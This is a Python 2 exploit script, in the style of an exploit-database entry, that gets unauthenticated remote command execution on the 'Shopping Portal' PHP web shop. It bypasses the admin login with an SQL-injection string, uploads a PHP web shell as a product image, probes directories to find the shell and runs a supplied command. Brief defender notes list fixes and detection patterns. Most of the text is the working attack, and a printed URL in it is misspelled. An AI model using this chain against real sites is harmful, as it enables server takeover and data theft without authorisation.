# Exploit Title: Shopping Portal ProVersion 3.0 - Authentication Bypass
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows
# Description:
# The username and password parameters of the admin panel login are vulnerable to SQL injection.
# username: joke' or '1'='1'# , password: joke' or '1'='1'#
# Also, there is no restriction on uploading malicious files in the "Insert Product" section.
# Together, these two vulnerabilities allow unauthenticated remote command execution.
#!/usr/bin/python
# Python 2 proof of concept (print statements, no parentheses). It chains the
# two issues listed in the header: the SQL-injection login bypass on the admin
# panel and the unrestricted upload in "Insert Product", which stores the
# supplied file under a web-served images directory.
#
# Defender's notes (review):
# - Login bypass: the admin login evidently interpolates the raw username and
#   password fields into its SQL; parameterized statements remove the issue.
# - Upload: insert-product.php keeps the client-supplied name and extension of
#   productimage1..3 and writes them under admin/productimages/<n>/. An
#   allow-list of image extensions, a server-side content check, a
#   server-generated filename, and a storage location the web server does not
#   execute scripts from would each block this.
# - Detection: a POST to /admin/index.php whose username or password field
#   contains "' or '1'='1'#"; a product insert whose image filename ends in
#   .php; a run of GETs probing /admin/productimages/<n>/command.php with
#   increasing <n>.

import requests
import sys
import urllib  # NOTE: imported but not used anywhere below.

# Exactly two positional arguments are expected: host/path and a command.
if (len(sys.argv) !=3) or sys.argv[1] == "-h":
    print "[*] Usage: PoC.py rhost/rpath command"
    print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
    exit(0)

rhost = sys.argv[1]
command = sys.argv[2]

url = "http://"+rhost+"/admin/index.php"
# Both login fields carry the injection string quoted in the header comment.
data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

# A single Session is used so the cookie set by the login is reused by the
# later upload and probe requests.
with requests.Session() as session:
    #login
    lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
    print ("[*] Status code for login: %s"%lg.status_code)
    # Only the HTTP status is checked; a 200 does not prove the bypass worked
    # (the login page itself answers 200), so the upload below may still fail.
    if lg.status_code != 200:
        print ("One bad day! Check web application path!")
        sys.exit()

    #upload file
    # productimage1 is the PHP file; the other two are filler text files.
    files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')}
    # Form fields mirroring the "Insert Product" form; the category and
    # subcategory ids are hard-coded and presumably match the stock database.
    fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""}

    furl = "http://"+rhost+"/admin/insert-product.php"
    fupload = session.post(url=furl, files=files, data=fdata)
    print ("[*] Status code for file uploading: %s"%fupload.status_code)

    if fupload.status_code != 200:
        print ("One bad day! File didn't upload.")
        sys.exit()

    # `dir` shadows the builtin; it is the numeric image subdirectory probed.
    dir = 0
    dirr = str(dir)

    #find uploaded file
    # The insert response apparently does not reveal which numbered
    # subdirectory the image landed in, so directories 0, 1, 2, ... are
    # probed in turn until one answers 200 (the loop has no upper bound).
    while True:
        el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php")

        if el.status_code == 200:
            print "File Found!"
            print "Put On A Happy Face!\r\n\r\n"
            print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command))
            break
        else:
            print "trying to find uploaded file..."
            dir += 1
            dirr = str(dir)

    #exec
    # The command is passed unencoded as the `cmd` query parameter read by
    # the uploaded file; the response body is printed verbatim.
    final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command)
    print final.text